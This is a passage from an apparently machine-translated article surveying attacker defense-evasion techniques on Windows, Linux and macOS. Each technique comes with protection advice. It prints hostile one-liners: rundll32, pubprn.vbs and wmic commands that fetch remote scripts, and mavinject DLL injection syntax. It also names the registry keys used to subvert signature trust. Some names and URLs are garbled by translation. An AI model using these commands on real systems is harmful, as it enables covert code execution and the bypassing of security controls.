    Another example of obfuscation is the use of steganography - a technique for hiding data or code in images, sound tracks, video and text files.

    Protection recommendations: Use tools for analyzing and detecting malicious code that not only checks the source code itself, but also analyzes the execution of commands. In Windows 10, this functionality is presented in the form of the Antimalware Scan Interface (AMSI).

    The presence of escape characters in commands, such as ^ or ", can serve as an indicator of obfuscation. Using Windows Sysmon and Event ID 4688 events, you can view the arguments of commands executed in various processes.

    Obfuscation used in payloads during the initial access stage can be detected on the network using an IDS system and email security gateways that identify compressed, encrypted data and scripts in attached files. The detection of payloads transmitted over an encrypted connection from a website can carried out with the inspection of encrypted traffic.

    Plist Modification

    System: macOS
    Rights: User, Administrator
    Description: Attackers can modify plist files, specifying in them their own code for its execution in the context of another user. The plist property files located in / Library / Preferences run with elevated privileges, and plist from ~ / Library / Preferences run with user privileges. Security Tips

    : Prevent plist files from being modified by making them read-only.

    Port knocking

    System: Linux, macOS
    Permissions: User
    Description: Attackers can use the Port Knocking methods to hide the open ports that they use to connect to the system.

    Security Tips : Using stateful firewalls can prevent some Port Knocking options from being implemented.

    Process doppelganging

    System: Windows
    Rights: User, Administrator, System
    Description: Transactional NTFS (TxF) is a technology introduced for the first time in Vista that allows file operations using transactions. In TxF, only one transaction descriptor can write a file at the moment, all other descriptors will be isolated and can only read the file version recorded at the moment of opening. If the system or application crashes, TxF will automatically roll back changes to the file. TxF is still included in Windows 10.

    The Process Doppelganging technique (with German. “Two-step transfer”, “double turn”) involves the use of undocumented WinAPI functions and is implemented in 4 steps:

    1. Transaction An NTFS transaction is created using the attacked executable file, and a temporary modified version of the executable file is created as part of the transaction.
    2. Loading. A shared section is created in memory, into which a modified version of the executable file is loaded.
    3. Rollback The NTFS transaction is rolled back, with the result that the original file being attacked is saved on the disk in its original form.
    4. Animation. Using a modified version of the executable file that remains in RAM, a process is created and its execution is launched.

    Thus, the malicious code will work in the context of a legitimate trusted process. Given that the attack occurs only in memory, because The NTFS transaction does not end, but “rolls back”, no traces of malicious activity will remain on the disk.

    Protection recommendations:Preventive security measures in the form of attempts to block some API calls are likely to have negative side effects. The protection vector should be aimed at preventing the launch of the attacker's tools at an earlier stage in the attack chain. Doppelganging can be used to bypass protection, but it is still good practice to block potentially dangerous applications and restrict software being used with whitelists. Attack detection is performed by analyzing calls to the CreateTransaction API functions, CreateFileTransacted, RollbackTransaction, undocumented functions like NTCreateProcessEX, NtCreateThreadEX, as well as API calls used to change memory in another process, such as WriteProcessMemory.

    Process Hollowing

    System: Windows
    Rights: User
    Description: The attack is carried out by replacing the image of the executable file of the process during the suspension of the process. Included in the top ten techniques of injection processes .

    Security Tips: Preventive security measures in the form of blocking some API calls are likely to have negative side effects. The protection vector should be aimed at preventing the launch of the attacker's tools at an earlier stage in the attack chain. Process Hollowing can be used to bypass protection, but it is still good practice to block potentially dangerous applications and restrict software being used with whitelisting.

    Code injection into process (Process Injection), Ten Process Injection Techniques

    System: Windows, Linux, macOS
    Permissions: User, Administrator, system, root
    Description: Process injection is a method of executing arbitrary code in the address space of a separate living process. Running code in the context of another process allows access to the memory of the process being injected, system / network resources, and possibly elevated privileges. Process injections can also be used to avoid possible detection of malicious activity by security tools. Techniques for implementing injections into processes are based on the abuse of various mechanisms that ensure the multithreading of programs in the OS. The following are some approaches to performing code injection into the process.

    • DLL injection. They are performed by recording the path to the malicious DLL inside the process and then executing it by creating a remote thread (Remote thread is a thread that works in the virtual address space of another process). In other words, the malware writes the DLL to the disk, and then uses a function like CreateRemoteTread, with which the LoadLibrary function will be called in the injected process.
    • PE injections (Portable executable injection) are based on the abuse of features of the execution of PE files in memory, such as a DLL or EXE. A malicious code is written into the process without writing any files to disk, and then using its additional code or by creating a remote stream, its execution is called.
    • Thread execution hijacking includes injection of malicious code or a path to a DLL directly into the process stream. Like the Process Hollowing technique, the flow must first be suspended.
    • Injections into asynchronous call procedures (Asynchronous Procedure Call (APC) injection) involve the attachment of malicious code to an APC Queue (APC Queue) process flow. One of the APC injection methods, called “Earle Bird injection”, involves creating a suspended process in which malicious code can be recorded and launched to the process entry point via APC. AtomBombing is another injection option that uses APC to invoke malicious code previously recorded in the Global atom table.
    • Injections into the local storage of the stream (Thread Local Storage (TLS) injection) involve manipulating the memory pointers inside the executable PE file to redirect the process to the malicious code.

    Mac and Linux
    • The system variables LD_RPELOAD, LD_LIBRARY_PATH (Linux), DYLIB_INSERT_LIBRARIES (macOS X) or the dlfcn application programming interface (API) can be used to dynamically load a library (shared object) into a process, which in turn can be used to intercept API calls from running processes.
    • The Ptrace system call can be used to connect to a running process and change while it is running.
    • / proc / [pid] / mem provides access to the process memory and can be used to read / write arbitrary data, but this method is rarely used due to the complexity of its implementation.
    • Capturing a VDSO (Virtual dynamic shared object) allows you to inject code during the execution of ELF binary files by manipulating code plugs from linux-vdso.so.
    Malicious programs typically use code injection into the process to access system resources, due to which an attacker can gain a foothold in the system and perform other changes in the attacked environment. More complex samples can perform multiple injections of processes to make their detection more difficult.

    Protection recommendations:Methods of code injection into processes are based on the abuse of regular functions of the OS, direct effects on which can lead to unstable operation of legitimate software and security products. Efforts to prevent interception techniques need to be focused on the earlier stages of the attack chain. Use tools to block potentially dangerous software, such as AppLocker. Use Yama as a preventive measure against code injection in ptrace, restricting the use of ptrace to only privileged users. Additional security measures may include the deployment of kernel security modules that provide advanced access control and process restriction. These tools include SELinux, grsecurity, AppArmor.

    Redundant Access

    System: Windows, Linux, macOS
    Permissions: User, Administrator, System
    Description:Attackers can simultaneously use several remote access tools with different control protocols in order to diversify detection risks. So, if one of the remote access tools is detected and blocked, but the protecting party has not identified all the attacker's tools, then the remote access to the attacked network will still be preserved. Attackers can also attempt to gain access to valid accounts of remote corporate services, such as VPN, in order to gain alternative access to the system in case of blocking the main tools of remote access. Using a web shell is also one of the methods of remote access to the network through a web server.

    Protection recommendations:Monitor availability and block launch of known remote access tools on your network (AmmyAdmin, Radmin, RemotePC, VNC, etc.), use application launch control tools and block potentially dangerous software. Implementing IDS and IPS systems that identify specific malicious programs with the help of signatures will reduce the likelihood of a successful attack, but over time, attackers will modify their tools to change the signature and, as a result, bypass IDS and IPS systems.

    Regsvcs / Regasm

    System: Windows
    Permissions: User, Administrator
    Description: Regsvcs and Regasm are Windows utilities used to register in the .NET Component Object Model (COM) assembly system. Both files are digitally signed by Microsoft. Criminals can use Regsvcs and Regasm to proxy code when the code that must be run before registering or unregistering is specified as an attribute: [ComRegisterFunction] or [ComUnregisterFunction]. Code with such attributes can be run even if the process is executed with insufficient privileges or even “crashes” at startup.

    Security Tips : Block Regsvcs.exe and Regasm.exe if they are not used on your system or network.


    System: Windows, Linux, macOS
    Permissions: Administrator, System, root
    Description: Rootkits are programs that hide the presence of malware by intercepting and changing API calls. Rootkits can operate at the user level, the OS kernel or even lower, at the hypervisor, MBR or system firmware levels. Opponents use rootkits to hide the presence of programs, files, network connections, drivers, and other OS components.

    Protection recommendations: Identify and block potentially dangerous software that may contain rootkits using software whitelisting tools, anti-virus tools, or built-in OS protection.

    Rundll32 (Poweliks)

    System: Windows
    Permissions: User
    Description: Rundll32.exe is a system utility for running programs in dynamic link libraries that can be called to proxy a binary file, execute Windows control files (.cpl) through undocumented functions of shel32.dll - Control_RunDLL and Control_RunDLLAsUser . Double-clicking on the .cpl file also causes Rundll32.exe to execute. Rundll32 can also be used to execute scripts such as javascript:

    rundll32.exe javascript: "\ .. \ mshtml, RunHTMLApplication"; document.write (); GetObject ("scrirpt: https [:] // www [.] Example [ .] com / malicious.sct ")"

    The above described method of using rundll32.exe is detected by antivirus software like a virus like Poweliks.

    Protection Tips: Attack Surface Reduction (ASR) in EMET and Advanced Theart Protection in Windows Defender can block the use of Rundll32.exe to bypass white lists.

    SIP and Trust Provider Capture (SIP and Trust Provider Hijacking) or Subverting Trust in Windows

    System: Windows
    Privileges: Administrator, System
    Description: Attackers can modify the components of the signing architecture and verify the digital signature of the Windows code in order to bypass the launch control tools that allow only signed code to be run. For creating, signing and verifying the signature of files of various formats in Windows, the so-called Subject Interface Package (SIP) is used — software specifications that are unique for each type of file and provide interaction between the API functions that initiate the creation, calculation and verification of signatures and directly files. The validity of the signature is confirmed by the so-called Trust ProviderThese are OS software components that implement various procedures related to calculating and verifying digital signatures.

    Popular attack methods:
    • Modification of keys DLL and FuncName in the section CryptSIPDllGetSignedDataMsg :
      HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Cryptography \ OID \ EncodingType 0 \ CryptSIPDllGetSignedDataMsg \ [SIP_GUID] .
      It is performed to replace the DLL library that provides the CryptSIPDllGetSignedDataMSG function .that returns a coded digital certificate from a signed file. A dummy function can always return a previously known valid signature value (for example, a Microsoft signature for executable system files) when using a modified SIP. The attacker may attempt to apply one valid signature to all files, however, this will most likely lead to the signature being invalid, since the hash returned by the function will not match the hash calculated from the file.
    • Modification of DLL and FuncName keys in the section:
      HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Cryptography \ OID \ EncodingType 0 \ CryptSIPDllVerifyIndirectData / [SIP_GUID] .
      It is executed with the purpose of replacing the DLL library that provides the CryptSIPDllVerifyIndirectData function , which checks the hash calculated from the file with the hash specified in the digital signature and returns the result of the verification (True / False). Thus, an attacker can ensure the successful verification of any file using a modified SIP. The above key values ​​can be redirected to a suitable function from an existing library, thus eliminating the need to create a new DLL file on disk.
    • Modification of DLL and FuncName keys in the section:
      HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Cryptography \ Providers \ Trust \ FinalPolicy / [Trust Provider GUID] .
      It is performed to replace the DLL library that provides the FinalPolicy function for a certain Trust Provider, which decodes, analyzes the signature and makes a decision about trust. By analogy with CryptSIPDllVerifyIndirectData, the value of the above keys can be redirected to an already existing DLL library.

    It is important to note that the described attack on the Windows trust mechanism can be implemented using the Search Search Hijacking DLL (DLL) technique.

    Security recommendations: Make sure that the users of the protected system cannot change the registry keys related to the SIP and Trust Provider components. Consider removing unnecessary and obsolete SIPs. Use all sorts of tools to block the download of malicious DLL, for example, AppLocker and DeviceGuard built into Windows.


    System: Windows, Linux, macOS
    Permissions: User
    Description: Attackers can use scripts to automate their actions, speed up operational tasks and, as a result, reduce the time required to gain access. Some scripting languages ​​can be used to bypass the processes monitoring mechanisms by directly interacting with the OS at the API level instead of calling other programs. Scripts can be embedded in Office documents as macros and then used for a phishing attack. In this case, the attackers are counting on the user launching a file with a macro or that the user agrees to activate the macro. There are several popular scripting frameworks - Metasploit, Veil, PowerSploit.

    Security Tips: Restrict access to scripts such as VBScript or PowerShell. In Windows, configure MS Office security settings by enabling secure viewing and disabling macros via GPO. If macros are needed, allow only signed, digitally signed macros to run. Use microsegmentation and application virtualization, for example, Sandboxie for Windows and Apparmor, Docker for Linux.

    Proxy code execution through signed binaries (Signed Binary Proxy Execution)

    System: Windows
    Permissions: User
    Description: Binary files signed with trusted digital certificates can run on Windows systems protected with digital signature verification. Several Microsoft default signed files when installing Windows can be used to proxy other files to run:

    • Mavinject.exe is a Windows utility that allows you to execute code. Mavinject can be used to enter a DLL into a running process:
    "C: \ Program Files \ Common Files \ microsoft shared \ ClickToRun \ MavInject32.exe" [PID] / INJECTRUNNING [PATH DLL];
    C: \ Windows \ system32 \ mavinject.exe [PID] / INJECTRUNNING [PATH DLL];
    • SyncAppvPublishingServer.exe - can be used to run powershell scripts without running powershell.exe.
    There are several similar binaries .

    Security Tips: Many signed files may not be used on your system, so consider blocking their launch.

    Proxy code execution through signed scripts (Signed Script Proxy Execution)

    System: Windows
    Permissions: Users
    Description: Scripts signed with trusted certificates can be used to proxify malicious files, for example, the PubPrn.vbs file is signed with a Microsoft certificate and can be used to launch a file from a remote server:
    cscript C: \ Windows \ System32 \ Printing_Admin_Scripts \ ru-RU \ pubprn.vbs script: http [:] //

    Security Recommendations: Such signed scripts may not be required on your system, therefore consider blocking their launch.

    Software Packing

    System: Windows
    Description:Packing programs involves the adversary using methods of compressing or encrypting executable files, which change the checksum of the file, thus avoiding detection based on the search for static signatures. Most decompression methods unpack executable code in memory. Examples of popular utilities - packers of executable files are MPRESS and UPS, but a whole host of other packers are known, in addition, opponents can create their own packaging methods that will not leave such artifacts as well-known packers. Packaging of executable files is not a definitive indicator of malware, as legitimate software developers can use packaging techniques to reduce distribution size or protect proprietary code.

    Protection recommendations:Update anti-virus protection tools, create custom signatures for malware detection, use heuristic detection methods. Identify and block potentially dangerous software.

    Space after file name (Space after Filename)

    System: Linux, macOS
    Permissions: User
    Description:Criminals can hide the true file type by changing its extension. With certain file types (does not work with .app files), adding a space character to the end of the file name will change the way the operating system processes the file. For example, if there is a Mach-O executable file called evil.bin, then when the user double-clicks the OS, he will start Terminal.app and execute it. If the same file is renamed to evil.txt, then when double-clicked, it will start in a text editor. However, if the file is renamed to “evil.txt” (space at the end), then double-clicking the type of the true file will determine the OS and the binary file will start. Attackers can use this technique to deceive a user and launch a malicious executable file.

    Protection recommendations:The use of this technique is difficult to prevent, because An attacker uses regular operating system mechanisms, so the protection vector must be directed at preventing malicious actions at earlier stages of the attack, for example, at the delivery stage or creating a malicious file in the system.


    System: Windows, Linux
    Permissions: User, Administrator, System
    Description: Timestomp is a change in the timestamps of a file (change, access, create). Often timestamping methods are used to disguise files that have been modified or created by an attacker so that they are not noticeable to forensic experts and forensica tools. Timestamping can be used in conjunction with the disguise of a file name to hide malicious software and tools from the attacker.

    Protection recommendations:Direct protection vector to prevent the launch of potentially dangerous and malicious software. Forznic describes methods for organizing detection tools for modifying timestamps by collecting information about opening a file descriptor and comparing it with the timestamps specified in the file.

    Trusted Developer Utilities

    System: Windows
    Permissions: User
    Description: There are many utilities that are used by software developers and which can be used to execute code in various forms during software development, debugging and reverse engineering. These utilities are often signed with digital certificates that allow them to perform malicious code proxying in the OS, bypassing the protection mechanisms and white sheets of applications.
    • MSBulid is a software creation platform used in Visual Studio. It uses projects in the form of XML files that describe the requirements for building various platforms and configurations. MSBuild from .NET version 4 allows you to insert C # code into an XML project, compile it, and then execute it. MSBulid.exe is signed with a Microsoft digital certificate.
    • DNX - .Net Execution Environmant (dnx.exe) is a development kit for the Visual Studio Enterprise. Dropped since .NET Core CLI in 2016. DNX is not available in standard Windows builds and can only be present on developer hosts when using .Net Core and ASP.NET Core 1.0. Dnx.exe is signed with a digital certificate and can be used to proxy code execution.
    • RCSI is a non-interactive command interface for C #, similar to csi.exe. It was introduced in the early version of the Roslyn .Net compiler platform. Rcsi.exe is signed with a Microsoft digital certificate. C # .csx script files can be written and executed using Rcsi.exe on the Windows command line.
    • WinDbg / CDB is the MS Windows kernel and utility for debugging in user-mode. The Microsoft cdb.exe console debugger is also a user-mode debugger. Both utilities can be used as standalone tools. Usually used in software development, reverse engineering and can not be found in conventional Windows systems. Both WinDbg.exe and CDB.exe are signed with a Microsoft digital certificate and can be used to code proxies.
    • Tracker - tracking utility file tracker.exe. Included in .NET as part of MSBuild. It is used to register calls in the Windows 10 file system. Attackers can use tracker.exe to execute DLLs in various processes. Tracker.exe is also signed with a Microsoft certificate.

    Protection recommendations: All the above files are subject to removal from the system if they are not used for their intended purpose by users.

    Valid accounts

    Description: Attackers can steal credentials of a specific user or service account using access credentials technicians, capture credentials in the process of exploration using social engineering. Compromised credentials can be used to bypass access control systems and gain access to remote systems and external services such as VPN, OWA, remote desktop, or gain elevated privileges in certain systems and network areas. If the script is successfully implemented, attackers can abandon malicious programs to make their detection more difficult. Also, attackers can create accounts using predefined names and passwords to save backup access in case of unsuccessful attempts to use other means.

    Security Recommendations: Apply password policy, follow recommendations for designing and administering a corporate network to limit the use of privileged accounts at all administrative levels. Regular checks of domain and local accounts and their rights in order to identify those that may allow an attacker to gain broad access. Monitoring account activity using SIEM systems.

    Web Service

    System: Windows
    Rights: User
    Description: Attackers can use a running, legitimate external Web service as a means of sending commands to control an infected system. Management servers are called Command and control (C & C or C2). Popular websites and social networks can act as a mechanism for C2, various publicly accessible services like Google or Twitter can also be used. All this helps to hide malicious activity in the general traffic flow. Web services typically use SSL / TLS, so opponents get an extra level of protection.

    Protection recommendations:Firewalls and web proxies can be used to implement external network communication policies. IDS / IPS systems using signature-based analysis can detect known malware at the network level. However, it should be borne in mind that over time, opponents will change the signatures of the C2 tools or rebuild the protocols in such a way as to avoid detection with the help of generally used means of protection. Using tools to monitor user behavior can also increase the chance of detecting abnormal activity.

    Processing XSL Scripts (XSL Script Processing)

    System: Windows
    Permissions: User
    Description:Extensible Stylesheet Language (* .xsl) is usually used to describe data processing and rendering in XML files. To support complex operations in XSL there is the possibility of embedding scripts in various languages ​​into the code. Malicious users may abuse this functionality to execute arbitrary files. Similar to the technique of abusing developers' trusted utilities (Trusted Developer Utilities), the trusted utility msxsl.exe, which converts an XML document to another form (html, wml, rtf, pdf, etc.) can be used to execute malicious JavaScript embedded in local or deleted (specified via URL links) XSL files. Since msxsl.exe is not installed by default, the adversary will most likely have to package it and other necessary files. An example call msxsl.exe:
    msxsl.exe customers [.] xml script [.] xsl .
    Another variant of this technique, called Squiblytwo, is to use WMI to call JScript or VBScript from an xsl file. This technique, like Squiblydoo, which abuses regsrv32.exe, also uses trusted Windows tools:
    • Local file: wmic process list /FORMAT:evil[.ralsxsl;
    • Deleted file: wmic os get /FORMAT : Acquirehttps:::/example ./com.

    Protection recommendations: If msxsl.exe is not used in the protected environment, block its execution. Turning off WMI on the contrary can lead to system instability, therefore, requires a preliminary assessment of the consequences.

    Also popular now: